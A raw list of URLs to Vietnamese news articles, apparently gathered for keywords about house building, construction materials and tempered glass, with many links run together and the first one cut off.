trieu-dong-a511745.htmlhttps://baotayninh.vn/xay-nha-khong-dung-hop-dong-bi-kien-ra-toa-a43230.htmlhttps://baoangiang.com.vn/cho-moi-hop-mat-chuc-sac-chuc-viec-cac-ton-giao-dan-toc-cac-doi-xay-nha-thi-cong-cau-duong-a294940.htmlhttp://hatinh24h.com.vn/kinh-hoang-canh-kinh-cuong-luc-phat-no-gam-day-nguoi-nhu-dan-hoa-cai-a68345.htmlhttp://thanhhoa24h.net.vn/dap-mai-khong-vo-kinh-cuong-luc-2-ten-cuop-tuc-dien-a397.htmlhttps://baodansinh.vn/dan-ba-vua-xay-nha-vua-xay-to-am-17072.htmhttp://antt.vn/dung-xay-nha-hat-hoa-sen-lon-nhat-thu-do-239654.htmhttp://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-giac-mo-viet-tiep-cau-chuyen-co-tich-a222853.htmlhttps://reatimes.vn/vi-pham-ve-san-xuat-vat-lieu-xay-dung-co-su-dung-amiang-trang-phat-den-90-trieu-dong-19062.htmlhttps://nguoidothi.net.vn/muon-xay-nha-tren-dat-nong-nghiep-phai-lam-sao-7763.htmlhttp://thanhhoa24h.net.vn/viet-nam-xay-nha-may-dien-hat-nhan-10-nam-nua-cung-khong-co-a161158.htmlhttps://reatimes.vn/lieu-donald-trump-co-phat-trien-nganh-vat-lieu-xay-dung-my-nhu-da-hua-2893.htmlhttp://thanhnienviet.vn/2021/03/04/bo-tui-kinh-nghiem-mua-dat-tho-cu-xay-nha-o/https://baothuathienhue.vn/ke-hoach-xay-nha-o-xa-hoi-cho-cong-nhan-moi-chi-dat-hon-40--a95006.htmlhttp://baoyenbai.com.vn/16/83048/Khai_quat_khao_co_hoc_xu_ly_di_doi_di_tich_di_vat_khu_vuc_xay_Nha_Quoc_hoi__.aspxhttps://nguoidothi.net.vn/xay-nha-o-tren-dat-nguoi-khac-co-duoc-cap-so-do-26662.htmlhttp://nghean24h.vn/mac-ho-henh-lo-vong-1-hoi-chi-em-nhan-du-gach-xay-nha-a613027.htmlhttp://hoinhabaovietnam.vn/Da-Nang-Dau-tu-8000-ti-dong-xay-nha-o-xa-hoi-cho-NLD-kho-khan_n73180.htmlhttp://antt.vn/thanh-hoa-bat-thuong-vu-xay-nha-may-nuoc-sach-ngoai-quy-hoach-24652.htmhttp://baobinhduong.vn/vat-lieu-xay-dung-binh-duong-tru-hang-thanh-cong-a236961.htmlhttp://baolangson.vn/kinh-te/62998-xay-nha-may-san-xuat-amon-nitrat-tai-thai-binh.htmlhttp://thanhnienviet.vn/2020/06/27/5-nam-tich-tien-mua-dat-doi-10-nam-van-khong-duoc-phep-xay-nha/https://baodansinh.vn/hdbank-ho-tro-xay-nha-cho-ho-ngheo-mien-nui-quang-ninh-20191005161128425.htmhttps://baotuyenquang.com.vn/xa-hoi/cuoc-song/yen-son-chung-tay-xay-nha-dai-doan-ket-138122.htmlhttps://www.bienphong.com.vn/bdbp-ho-tro-xay-nha-cho-ho-ngheo-o-cac-xa-bien-gioi-post342081.htmlhttps://baodansinh.vn/nghe-an-phat-hien-qua-bom-270-kg-khi-dao-mong-xay-nha-74125.htmhttp://baolangson.vn/xa-hoi/39068-43-300-ho-ngheo-tay-nguyen-duoc-ho-tro-xay-nha-moi.htmlhttp://nghean24h.vn/vu-chay-14-nguoi-chet-lo-dien-ong-chu-dai-gia-xay-nha-khap-sai-gon-a517875.htmlhttps://baothuathienhue.vn/corning-ra-mat-kinh-cuong-luc-cho-may-tinh-bang-va-tv-a72098.htmlhttp://antt.vn/de-xay-ra-xay-nha-trai-phep-hang-loat-bi-thu-chu-tich-o-nghe-an-bi-ky-luat-309646.htmhttp://baoyenbai.com.vn/12/88633/Cam_xuat_khau_8_loai_khoang_san_lam_vat_lieu_xay_dung.aspxhttp://nghean24h.vn/vi-sao-ca-ngan-ho-dan-tu-choi-nhan-ho-tro-xay-nha-tranh-lu-a442434.htmlhttps://baolongan.vn/viet-nam-cuba-huong-toi-lien-doanh-san-xuat-vat-lieu-xay-dung-a20238.htmlhttp://antt.vn/dai-gia-xay-nha-40-ti-cho-sinh-vien-tang-xe-camry-con-minh-chay-xe-may-cui-bap-8564.htmhttps://baodansinh.vn/thanh-hoa-khoi-cong-xay-nha-khan-quang-do-cho-hoc-sinh-mo-coi-20200325163628975.htmhttp://baoquangtri.vn/Kinh-te/modid/419/ItemID/95560/title/Huy-dong-moi-nguon-luc-de-giup-ho-ngheo-xay-nha-phong-tranh-bao-luhttps://daklak24h.com.vn/xa-hoi/23431/khoi-cong-xay-nha-tang-ho-ngheo.htmlhttps://baolongan.vn/gan-1-5-ti-dong-xay-nha-tinh-nghia-tinh-thuong-a9709.htmlhttp://baolangson.vn/quoc-te/110577-israel-thuc-day-cac-ke-hoach-xay-nha-dinh-cu-tai-jerusalem.htmlhttps://reatimes.vn/cach-phu-nu-thong-minh-tham-gia-vao-viec-xay-nha-de-thuan-vo-thuan-chong-7112.htmlhttps://nguoidothi.net.vn/tp-hcm-chan-chinh-nan-bao-ke-chia-lo-ban-nen-xay-nha-khong-phep-tren-dat-nong-nghiep-23847.htmlhttps://tieudungplus.vn/tphcm-de-xuat-xay-nha-hat-giao-huong-hon-1500-ty-tai-thu-thiem-28565.htmlhttp://nghean24h.vn/gan-10-nam-toi-di-xe-buyt-de-danh-tien-mua-dat-xay-nha-a487143.htmlhttp://thanhnienviet.vn/2017/07/06/luong-3-4-trieu-ma-xay-nha-lau-di-xe-hoi-du-luan-nghi-ngo-la-dung/https://baothuathienhue.vn/siet-chat-kiem-tra-o-to-cho-vat-lieu-xay-dung-a84346.htmlhttps://baodansinh.vn/hon-800-ty-dong-xay-nha-may-dien-mat-troi-thanh-hoa-57669.htmhttps://baotayninh.vn/tan-chau-khoi-cong-xay-nha-cong-vu-cho-giao-vien-mam-non-a8834.htmlhttp://hatinh24h.com.vn/xay-nha-moi-sang-xin-nhu-trung-tam-giai-tri-viet-anh-giau-co-nao-a144663.htmlhttp://baoyenbai.com.vn/12/41212/Dieu_chinh_gia_va_hop_dong_xay_dung_do_bien_dong_gia_nguyen_lieu_nhien_lieu_va_vat_lieu_xay_dung.aspxhttps://tieudungplus.vn/xay-nha-moi-can-tuan-thu-nguyen-tac-phong-thuy-nao-11704.htmlhttp://baoyenbai.com.vn/227/46636/Long_ga_co_the_lam_vat_lieu_xay_dung.aspxhttp://thanhhoa24h.net.vn/hieu-truong-len-lut-xay-nha-tren-dat-cong-vao-ban-dem-a109815.htmlhttps://reatimes.vn/muc-boi-thuong-khi-xay-nha-lam-anh-huong-den-hang-xom-1430.htmlhttps://reatimes.vn/chi-so-gia-tieu-dung-nha-o-va-vat-lieu-xay-dung-tang-034-trong-thang-5-25525.htmlhttps://baoangiang.com.vn/bidv-ho-tro-tren-10-ty-dong-xay-nha-truong-hoc-va-tang-qua-tet-cho-nguoi-dan-an-giang-a217198.htmlhttps://baothuathienhue.vn/xu-phat-cong-ty-co-phan-vat-lieu-xay-dung-huong-ho-90-trieu-dong-a91683.htmlhttp://baobinhduong.vn/khai-truong-phong-giao-dich-bao-loc-acb-tang-100-trieu-dong-xay-nha-tinh-thuong-a29270.htmlhttps://daklak24h.com.vn/xa-hoi/8117/chi-bo-cong-ty-co-phan-vat-lieu-xay-dung-20-vung-vang-trong-gian-kho.htmlhttps://baothuathienhue.vn/huong-tra-xay-nha-tinh-thuong-cho-hoi-vien-nong-dan-co-hoan-canh-kho-khan-a70792.htmlhttps://baodansinh.vn/2-3-ty-dong-xay-nha-noi-tru-cho-hoc-sinh-truong-thcs-xa-thuan-mang-ngan-son-bac-can-12093.htmhttp://thanhnienviet.vn/2020/07/01/da-nang-so-noi-vu-de-nghi-thu-hoi-cong-van-dung-cap-phep-xay-nha-o-ket-hop-thuong-mai-dich-vu/http://hatinh24h.com.vn/huong-son-vat-lieu-xay-dung-tan-cong-truong-hoc-a7665.htmlhttp://antt.vn/dau-gia-mo-vat-lieu-xay-dung-o-ha-tinh-tu-lenh-nganh-ly-giai-nguyen-nhan-cham-tre-304856.htmhttps://reatimes.vn/ban-tin-bds-24h-dung-co-che-dat-hang-xay-nha-o-thuong-mai-1608970442871.htmlhttps://baodansinh.vn/hon-17000-ho-ngheo-khu-vuc-mien-trung-duoc-ho-tro-xay-nha-tranh-bao-lu-96876.htmhttps://baodongkhoi.vn/gop-cong-xay-nha-cho-thuong-binh-07112010-a9695.htmlhttp://hatinh24h.com.vn/doanh-nghiep-lan-bien-xay-nha-hang-trai-phep-tai-ha-tinh-sai-pham-cong-khai-xu-ly-i-ach-a102148.htmlhttp://baoyenbai.com.vn/11/57934/Khoi_cong_xay_Nha_Quoc_hoi.aspxhttp://nguoihanoi.com.vn/vi-sao-dan-bac-lieu-dua-xay-nha-lau-nuoi-chim-yen-giua-tp_236799.htmlhttps://daklak24h.com.vn/tin-kinh-te/45123/quan-ly-do-thi-xay-nha-nuoi-chim-yen-trong-do-thi-co-quan-chuc-nang-lung-tung.htmlhttp://baobinhduong.vn/tuot-thang-may-van-chuyen-vat-lieu-xay-dung-mot-cong-nhan-nguy-kich-a104020.htmlhttps://reatimes.vn/nganh-vat-lieu-xay-dung-2019-buc-tranh-nhieu-sac-mau-32331.htmlhttps://baodansinh.vn/geleximco-muon-xay-nha-may-nhiet-dien-ty-usd-voi-doi-tac-trung-quoc-71927.htmhttps://www.bienphong.com.vn/khanh-thanh-xay-nha-chong-lu-tai-thanh-hoa-post19757.htmlhttps://reatimes.vn/tphcm-trong-2-nam-toi-se-khong-xay-nha-cao-tang-tai-quan-1-va-quan-3-26786.htmlhttps://daklak24h.com.vn/xa-hoi/27397/huyen-krong-pac-no-luc-hoan-thanh-chi-tieu-xay-nha-167.htmlhttps://reatimes.vn/bat-dong-san-24h-tphcm-hoc-tap-binh-duong-xay-nha-cho-cong-nhan-gia-100-trieu-dong-1691.htmlhttps://baodansinh.vn/ca-si-thuy-tien-se-xay-nha-cong-dong-tranh-lu-mua-thuyen-cuu-ho-trong-nha-cho-ca-thon-20201025095002174.htmhttp://thanhhoa24h.net.vn/nguoi-dan-khanh-hoa-xay-nha-nuoi-ong-du-tranh-bao-a96418.htmlhttp://baoyenbai.com.vn/12/97288/Bo_quy_dinh_cam_xay_nha_nhai_kien_truc_kieu_Phap.aspxhttps://reatimes.vn/go-kho-the-nao-cho-vat-lieu-xay-dung-xanh-27929.htmlhttps://giaoducthoidai.vn/phap-luat/gia-dinh-can-bo-quan-thu-duc-tphcm-xay-nha-trai-phep-xu-ly-nghiem-khong-co-vung-cam-3826807.htmlhttps://baodansinh.vn/ubnd-tp-hue-dat-da-duyet-du-an-van-cap-phep-cho-nguoi-dan-xay-nha-44714.htmhttp://baolangson.vn/xa-hoi/45134-xay-nha-trai-phep-trong-chua-quan-am-tu-quang-binh.htmlhttps://baoquangbinh.vn/kinh-te/202103/toan-tinh-hien-co-72-doanh-nghiep-san-xuat-vat-lieu-xay-dung-2186386/http://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-dat-chi-tieu-tru-hang-doi-manh-2019-a194576.htmlhttp://thanhnienviet.vn/2020/09/22/tong-hop-kinh-nghiem-chon-vat-lieu-xay-nha-ben-chac-tiet-kiem-chi-phi/https://baotayninh.vn/can-quan-ly-nghiem-viec-xay-nha-nuoi-chim-yen-a124741.htmlhttps://reatimes.vn/doanh-nghiep-co-von-nuoc-ngoai-thue-dat-xay-nha-co-duoc-phep-ban-360.htmlhttps://baodansinh.vn/ubnd-phuong-van-quan-chiem-dat-xay-nha-van-hoa-42916.htmhttps://reatimes.vn/san-xuat-vat-lieu-xay-dung-khong-nung-tu-tro-xi-can-be-do-chinh-sach-26794.htmlhttps://baotayninh.vn/siet-chat-viec-cap-giay-phep-xay-nha-tam-a51937.htmlhttp://baoyenbai.com.vn/17/114796/Tu_19_xay_nha_tu_7_tang_phai_bao_cao_So_Xay_dung.aspxhttp://baolangson.vn/quoc-te/99714-nga-giup-viet-nam-xay-nha-may-dien-hat-nhan.htmlhttps://baodongkhoi.vn/be-mac-giai-bong-chuyen-bai-cat-tinh-ben-tre-tranh-cup-vat-lieu-xay-dung-lan-thu-iii-nam-2011-01062011-a4044.htmlhttp://nghean24h.vn/cam-tien-theo-trai-vao-nghe-an-xay-nha-vo-ho-ra-di-tay-trang-con-bi-bat-chiu-tien-an-hoi-de-gat-no-a570184.htmlhttps://tieudungplus.vn/ban-tin-bds-24h-dung-co-che-dat-hang-xay-nha-o-thuong-mai-1608970442871.htmlhttp://baoyenbai.com.vn/18/115231/LHQ_de_xuat_giam_sat_nhap_khau_vat_lieu_xay_dung_vao_Gaza.aspxhttps://reatimes.vn/hoa-chat-nano-duoc-su-dung-trong-chong-chay-cho-vat-lieu-xay-dung-1606296818126.htmlhttp://nghean24h.vn/nghe-an-chinh-quyen-lam-ngo-truoc-tinh-trang-xay-nha-kien-co-tren-dat-ven-bien-a537136.htmlhttps://www.bienphong.com.vn/len-lut-xay-nha-cho-du-an-tiem-an-nguy-co-mat-an-ninh-trat-tu-post338349.htmlhttp://thanhhoa24h.net.vn/tphcm-muon-xay-nha-hat-1500-ty-chua-nen-voi-a129984.htmlhttps://baotuyenquang.com.vn/kinh-te/cong-nghiep-ha-tang/san-xuat-vat-lieu-xay-dung-giai-doan-2015-2020!-62777.htmlhttp://thanhnienviet.vn/2021/02/22/gia-chu-soc-trang-xay-nha-de-chiu-nhu-resort-tren-manh-dat-vua-hep-vua-dai/http://antt.vn/cap-so-do-xay-nha-tren-cong-thoat-nuoc-298173.htmhttp://danang24h.vn/da-co-kinh-cuong-luc-gorilla-glass-the-he-5-sieu-ben-a72522.htmlhttps://reatimes.vn/doanh-nghiep-vat-lieu-xay-dung-ong-lon-di-lui-27558.htmlhttps://baodansinh.vn/vingroup-sap-xay-nha-may-duoc-pham-tai-bac-ninh-72134.htmhttps://baolongan.vn/trao-tang-tien-xay-nha-tinh-thuong-cho-cuu-chien-binh-a40407.htmlhttps://baothuathienhue.vn/vat-lieu-xay-dung-dan-dau-bang-xep-hang-tang-truong-pmi-nganh-cua-chau-a-a60174.htmlhttps://baotayninh.vn/1-000-ty-dong-xay-nha-lam-viec-cac-co-quan-quoc-hoi-a19983.htmlhttp://danang24h.vn/hai-nguoi-bi-vat-lieu-xay-dung-de-chet-thuong-tam-a120942.htmlhttp://hatinh24h.com.vn/xay-nha-sieu-cao-tang-se-de-bep-nha-phap-co-ga-ha-noi-a74510.htmlhttp://baoquangtri.vn/Thoi-su/modid/445/ItemID/74514/title/Bao-Thanh-Nien-xay-nha-nhan-ai-va-cuu-tro-tai-Quang-Tri-http://baoquangtri.vn/Van-hoa-The-thao/modid/421/ItemID/106700/title/Lang-hai-mo-hoi-xay-nha-cho-dan-ngheo-https://baotuyenquang.com.vn/phong-su/hien-dat-xay-nha-van-hoa-o-khuon-ha-87580.htmlhttps://baolongan.vn/van-dong-ung-ho-xay-nha-dai-doan-ket-tren-huyen-dao-truong-sa-a52996.htmlhttps://www.bienphong.com.vn/don-bp-ckqt-cau-treo-xay-nha-huu-nghi-cho-ho-ngheo-tai-lao-post3360.htmlhttps://reatimes.vn/xay-nha-moi-can-tuan-thu-nguyen-tac-phong-thuy-nao-198.htmlhttp://baolangson.vn/quoc-te/99955-i-xra-en-cong-bo-ke-hoach-xay-nha-dinh-cu-moi-gan-dong-gie-ru-xa-lem.htmlhttp://antt.vn/dai-gia-xay-nha-san-go-lim-hon-200-ty-o-dien-bien-la-ai-2355.htmhttps://baotayninh.vn/xay-nha-tuong-niem-bac-ho-tai-truong-sa-a18883.htmlhttp://baolangson.vn/the-thao/the-thao-trong-nuoc/319523-giai-golf-tu-thien-xay-nha-tinh-nghia-va-giup-do-dong-bao-mien-trung.htmlhttps://baodansinh.vn/ho-ngheo-xay-nha-o-duoc-ho-tro-the-nao-94364.htmhttps://baodansinh.vn/khanh-hoa-trao-265-trieu-dong-ho-tro-doan-vien-xay-nha-mai-am-20191104170037671.htmhttp://thanhnienviet.vn/2020/11/14/cong-lung-vi-1-phut-si-dien-muon-xay-nha-to-ra-o-rieng/https://tieudungplus.vn/bds-24h-du-thao-nghi-dinh-quan-ly-vat-lieu-xay-dung-phai-gan-lien-voi-thuc-te-1602916282838.htmlhttps://nguoidothi.net.vn/tranh-luan-viec-xay-nha-hat-giao-huong-o-thu-thiem-16058.htmlhttp://thanhnienviet.vn/2020/09/12/lan-dau-tien-mot-thuong-hieu-san-xuat-vat-lieu-xay-dung-dat-set-nung-viet-nam-lap-cu-dup-ky-luc-the-gioi/https://giaoducthoidai.vn/gia-dinh/nguoi-dan-ong-nga-xay-nha-tren-cay-cua-hang-xom-khi-ho-di-nghi-3757877.htmlhttp://thanhhoa24h.net.vn/nguyen-chu-tich-mat-tran-to-quoc-tinh-xay-nha-trai-phep-tren-nui-a160057.htmlhttp://baobinhduong.vn/giai-bong-chuyen-tre-cup-clb-toan-quoc-2019-tre-vat-lieu-xay-dung-binh-duong-ra-quan-an-tuong-a206782.htmlhttp://baolangson.vn/xa-hoi/42846-ho-tro-nguoi-dan-xay-nha-luu-tru-cho-cong-nhan.htmlhttps://baodansinh.vn/hoa-phat-bien-xi-hat-lo-cao-thanh-vat-lieu-xay-dung-bao-ve-moi-truong-83064.htmhttp://baoyenbai.com.vn/12/123296/Tap_doan_Han_Quoc_xay_nha_may_angten_khong_day_tai_Ha_Nam.aspxhttp://danang24h.vn/tu-15-8-xay-nha-phai-ky-cam-ket-dam-bao-an-toan-cho-hang-xom-a37138.htmlhttp://hatinh24h.com.vn/chay-kho-vat-lieu-xay-dung-nhieu-nguoi-chay-tan-loan-a104533.htmlhttps://baodansinh.vn/thua-thien-hue-bo-sung-gan-39-ty-dong-ho-tro-xay-nha-o-cho-nguoi-co-cong-voi-cach-mang-20200829093057066.htmhttps://baoangiang.com.vn/ma-tran-thi-truong-kinh-cuong-luc-a255236.htmlhttp://baolangson.vn/khoa-hoc-tin-hoc/228150-nghien-cuu-su-dung-tro-xi-cua-nha-may-nhiet-dien-na-duong-lam-mat-duong-giao-thong-nong-thon-thay-the-vat-lieu-xay-dung-gop-phan-bao-ve-moi-truong.htmlhttps://giaoducthoidai.vn/ket-noi/xay-nha-ve-sinh-truong-hoc-tu-chat-lieu-gach-sinh-thai-lJV9mYUGR.htmlhttps://baotayninh.vn/xay-nha-khong-phep-bi-lang-gieng-phan-ung-a85151.htmlhttp://baoquangtri.vn/Xa-hoi/modid/420/ItemID/133991/title/Ho-tro-hoi-vien-phu-nu-ngheo-xay-nha-ve-sinhhttp://thanhnienviet.vn/2020/10/10/roi-sai-gon-ra-da-nang-cap-vo-chong-mua-dat-xay-nha-3-tang-dep-nhu-resort/https://reatimes.vn/ly-giai-su-tang-gia-vat-lieu-xay-dung-o-metro-manila-2753.htmlhttps://giaoducthoidai.vn/chuyen-la/xay-nha-vuong-cay-co-thu-tram-tuoi-gia-dinh-quyet-dinh-lam-mot-viec-khien-ai-di-qua-cung-phai-nguoc-nhin-3804078.htmlhttp://baoyenbai.com.vn/12/39196/Gia_vat_lieu_xay_dung_tang_cac_nha_thau_lao_dao.aspxhttps://nguoidothi.net.vn/bac-bo-y-tuong-xay-nha-gia-re-25m2-o-tp-hcm-7590.htmlhttps://baothuathienhue.vn/bao-thua-thien-hue-gop-suc-xay-nha-tinh-nghia-cho-ho-ngheo-o-khanh-hoa-a41376.htmlhttp://baobinhduong.vn/xa-phu-an-thi-xa-ben-cat-khoi-cong-xay-nha-nhan-ai-a100980.htmlhttps://reatimes.vn/phat-trien-vat-lieu-xay-dung-xanh-can-co-che-ro-rang-35549.htmlhttps://baolongan.vn/xay-nha-bi-nghieng-mat-long-hang-xom-a69250.htmlhttps://baolongan.vn/doan-thanh-nien-ho-tro-xay-nha-va-tang-qua-cho-nguoi-ngheo-a41668.htmlhttps://reatimes.vn/them-sieu-thi-vat-lieu-xay-dung-tai-tp-ho-chi-minh-202327.htmlhttps://baotayninh.vn/israel-cho-phep-chuyen-vat-lieu-xay-dung-vao-dai-gaza-a61303.htmlhttps://reatimes.vn/can-danh-thue-cao-dat-xay-nha-o-nhung-bo-hoang-20200112143950928.htmlhttps://baolongan.vn/de-xuat-lap-ho-thanh-cong-de-xay-nha-tai-dinh-cu-a35482.htmlhttps://reatimes.vn/ca-thon-xay-nha-khong-so-do-vi-co-che-la-lung-459.htmlhttps://baotuyenquang.com.vn/kinh-te/cong-nghiep-ha-tang/day-manh-phat-trien-cong-nghiep-che-bien-vat-lieu-xay-dung-co-khi-128698.htmlhttps://reatimes.vn/vat-lieu-xay-dung-khong-nung-kho-canh-tranh-tren-thi-truong-20200515101926927.htmlhttps://www.bienphong.com.vn/10-ngu-dan-mien-trung-co-hoan-canh-kho-khan-duoc-ho-tro-tien-xay-nha-post16069.htmlhttps://giaoducthoidai.vn/thoi-su/chu-tich-da-nang-neu-tuong-ca-xay-nha-trai-phep-xu-khong-vuong-ban--484509.htmlhttp://baolangson.vn/xa-hoi/34988-tra-vinh-chu-trong-cong-tac-xay-nha-o-cho-cong-nhan-va-cham-soc-nguoi-ngheo.htmlhttp://thanhnienviet.vn/2020/09/28/nha-lech-tang-la-gi-co-nen-xay-nha-lech-tang-hay-khong/
http://baobinhduong.vn/xay-nha-dac-biet-de-an-nau-trong-ngay-tan-the-a87204.html
https://baotayninh.vn/xay-nha-nhan-ai-cho-thanh-nien-ngheo-a114790.html
http://hatinh24h.com.vn/nguoi-dan-chi-hang-tram-trieu-dong-xay-nha-lau-cho-heo-tranh-lu-a77072.html
http://baolangson.vn/quoc-te/324262-australia-chi-hon-700-trieu-usd-xay-nha-may-san-xuat-vacxin.html
https://baodansinh.vn/lai-suat-cho-vay-xay-nha-o-xa-hoi-la-45---5nam-22999.htm
http://hatinh24h.com.vn/nam-tan-suu-2021-xay-nha-theo-nhung-huong-nay-mang-lai-dai-cat-dai-loi-a149268.html
https://giaoducthoidai.vn/kinh-te-xa-hoi/nam-2021-truong-hop-xay-nha-o-nao-duoc-mien-giay-phep-xay-dung-AiT1tqAGR.html
https://baodansinh.vn/quang-binh-phan-bo-them-17-ty-dong-xay-nha-o-phong-tranh-bao-lut-cho-ho-ngheo-58599.htm
https://baothuathienhue.vn/dieu-kien-ho-kinh-doanh-duoc-tham-do-khoang-san-lam-vat-lieu-xay-dung-thong-thuong-a34984.html
http://nghean24h.vn/xay-nha-pho-sai-gon-35-tang-co-san-vuon-voi-13-ty-a505359.html
https://baotayninh.vn/750-trieu-dong-xay-nha-mai-am-mobifone-a86607.html
https://daklak24h.com.vn/kinh-te/18657/dung-chuyen-dat-rung-de-xay-nha-may-thuy-dien-drang-phok.html
http://thanhnienviet.vn/2019/11/08/pham-tam-tai-co-xay-nha-nam-2020-duoc-khong/
http://hatinh24h.com.vn/ha-tinh-nguon-vat-lieu-xay-dung-doi-dao-dang-bi-bo-quen-a108273.html
https://reatimes.vn/bien-dong-gia-nha-o-va-vat-lieu-xay-dung-gop-phan-tang-013-cpi-thang-11-20191129115245860.html
http://baolangson.vn/quoc-te/305166-nhat-ban-ky-thoa-thuan-xay-nha-may-dien-mat-troi-lon-dau-tien-o-qatar.html
https://reatimes.vn/de-xuat-xay-nha-hat-1500-ty-dong-o-thu-thiem-bang-tien-ban-dau-gia-khu-dat-23-le-duan-29908.html
https://www.bienphong.com.vn/xay-nha-tang-tre-mo-coi-post21182.html
https://tieudungplus.vn/nganh-vat-lieu-xay-dung-lao-dao-truoc-kho-khan-kep-20200328212557128.html
http://baoquangtri.vn/Thoi-su/modid/445/ItemID/70984/title/Bo-Tu-lenh-Bo-doi-Bien-phong-Ho-tro-60-trieu-dong-xay-nha-tinh-nghia-
http://vinh24h.vn/ngang-nhien-bit-duong-xuong-bien-de-chua-vat-lieu-xay-dung-a113018.html
https://reatimes.vn/doi-von-xay-nha-cho-nguoi-thu-nhap-thap-28109.html
https://baoangiang.com.vn/cho-moi-phat-dong-ho-tro-xay-nha-cho-ho-ngheo-giai-doan-2020-2025-a278152.html
http://baoyenbai.com.vn/18/138195/Lanh_dao_Israel_tiep_tuc_phe_duyet_ke_hoach_xay_nha_dinh_cu_moi.aspx
https://reatimes.vn/tre-vat-lieu-xay-dung-hoan-hao-cho-cong-trinh-xanh-19412.html
http://hatinh24h.com.vn/tu-van-xay-nha-ba-tang-850-trieu-o-sai-gon-a91054.html
https://tieudungplus.vn/san-pham-hang-hoa-vat-lieu-xay-dung-dua-ra-thi-truong-phai-dat-tieu-chuan-da-cong-bo-20201231000000916.html
https://giaoducthoidai.vn/gia-dinh/tuoi-nao-xay-nha-nam-tan-suu-2021-de-don-duoc-cat-lanh-OQtvC0LMg.html
https://reatimes.vn/go-doc-can-se-lam-mua-lam-gio-tai-thi-truong-vat-lieu-xay-dung-chau-a-2776.html
http://baobinhduong.vn/bai-tap-ket-vat-lieu-xay-dung-anh-huong-cuoc-song-nguoi-dan-chinh-quyen-dia-phuong-vao-cuoc-xu-ly-a222440.html
http://baoquangtri.vn/Xa-hoi/modid/420/ItemID/58444/title/Hon-3-ti-dong-xay-nha-cong-vu-cho-giao-vien-
https://reatimes.vn/doanh-nghiep-nganh-vat-lieu-xay-dung-can-duoc-ho-tro-ve-chinh-sach-1608694278526.html
http://danang24h.vn/tu-nam-2021-dat-quy-hoach-treo-van-co-the-xay-nha-moi-a157037.html
http://nghean24h.vn/kinh-cuong-luc-bat-ngo-vo-roi-trung-dau-em-be-dang-choi-trong-nha-khien-nhieu-nguoi-hoang-so-a585837.html
https://reatimes.vn/tphcm-xay-nha-hat-khong-anh-huong-den-loi-ich-nguoi-dan-thu-thiem-401012.html
https://reatimes.vn/doanh-nghiep-san-xuat-vat-lieu-xay-dung-viet-noi-lo-doi-pho-hang-trung-quoc-17330.html
https://baotuyenquang.com.vn/xa-hoi/cuoc-song/ho-tro-ho-ngheo-xay-nha-ve-sinh-124058.html
https://baodansinh.vn/lao-cai-xay-nha-ve-sinh-nha-tam-cho-cac-truong-hoc-77851.htm
http://hatinh24h.com.vn/ba-noi-lo-khi-xay-nha-a109254.html
https://baodansinh.vn/cap-giay-phep-lao-dong-va-xay-nha-cho-nguoi-lao-dong-tai-kcnc-hoa-lac-59835.htm
https://nguoidothi.net.vn/canh-bao-ve-cuoc-chay-dua-xay-nha-may-dien-mat-troi-16259.html
https://baodansinh.vn/gia-lai-dung-dat-xay-nha-may-lam-san-tap-danh-golf-97017.htm
http://baobinhduong.vn/khuyen-khich-doanh-nghiep-san-xuat-vat-lieu-xay-dung-ap-dung-cong-nghe-moi-a219681.html
http://baoquangtri.vn/Ban-doc-phap-luat/modid/422/ItemID/137129/title/Can-som-khac-phuc-viec-xay-nha-chong-len-duong-giao-thong
https://baoangiang.com.vn/nhat-ban-phan-doi-nga-xay-nha-trai-tai-cac-dao-tranh-chap-a236986.html
https://www.bienphong.com.vn/bdbp-da-nang-van-dong-200-trieu-dong-xay-nha-tinh-nghia-post88845.html
https://baotayninh.vn/vu-xay-nha-lan-chiem-hem-cong-cong-lai-xin-hop-thuc-hoa-xin-chu-truong-ban-dat-cho-nguoi-lan-chiem-dat-cong--a41958.html
https://baodansinh.vn/nguoi-xay-nha-cho-chim-yen-dem-ca-phao-mam-tom-tan-cong-thi-truong-my-7314.htm
https://baotayninh.vn/bo-xay-dung-chinh-sach-ho-tro-nguoi-ngheo-xay-nha-hien-nay-la-phu-hop-a89776.html
http://nghean24h.vn/nguoi-than-bi-thu-xa-xay-nha-trai-phep-tren-dat-nong-nghiep-a512340.html
https://baodansinh.vn/khong-su-dung-von-nha-nuoc-xay-nha-ga-t3-san-bay-tan-son-nhat-20200114150000201.htm
http://baoyenbai.com.vn/22/45476/Hon_865_trieu_USD_xay_nha_may_nhiet_dien_Thang_Long.aspx
http://baolangson.vn/xa-hoi/37950-phong-trao-hien-dat-xay-nha-van-hoa-thon-o-dong-buc.html
https://nguoidothi.net.vn/thu-tuong-chua-xay-nha-cao-tang-khi-phuong-an-giao-thong-chua-co-loi-ra-6681.html
https://reatimes.vn/ha-noi-lenh-xu-ly-tinh-trang-no-ro-xay-nha-tren-dat-nong-nghiep-20200229223018669.html
http://baobinhduong.vn/tan-hiep-phat-dau-tu-4-000-ty-dong-xay-nha-may-nuoc-giai-khat-o-hau-giang-a197754.html
http://baolangson.vn/xa-hoi/42844-ldld-tinh-tham-va-ho-tro-kinh-phi-xay-nha-mai-am-tinh-thuong-cho-doan-vien-lao-dong-ngheo.html
https://reatimes.vn/5-bi-quyet-de-xay-nha-sieu-nho-ban-khong-nen-bo-qua-23394.html
http://baolangson.vn/quoc-te/100898-can-danh-gia-toan-dien-ve-anh-huong-cua-du-an-thuy-dien-xay-nha-bu-ri.html
https://baodansinh.vn/yeu-da-lat-cap-vo-chong-9x-quyet-roi-sai-gon-ve-xay-nha-vuon-binh-yen-song-cuoc-song-mo-uoc-22202027155021600.htm
http://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-thua-2-tran-lien-tiep-a236569.html
http://baoquangtri.vn/Thoi-su/modid/445/ItemID/66290/title/Xay-nha-tinh-thuong-cho-phu-nu-ngheo-
https://baodongkhoi.vn/dai-hoi-chi-bo-3-thuoc-dang-bo-cong-ty-co-phan-vat-lieu-xay-dung-nhiem-ky-2018-2020-31032018-a48061.html
http://baoquangtri.vn/Thoi-su/modid/445/ItemID/95791/title/Giai-ngan-von-vay-xay-nha-phong-tranh-bao-lu-cho-ho-ngheo
http://baoquangtri.vn/Kinh-te/modid/419/ItemID/25590/title/Hoi-Phu-nu-tinh-Quang-Tri-Ho-tro-tren-977-trieu-dong-xay-nha-Dai-doan-ket-cho-ho-ngheo-
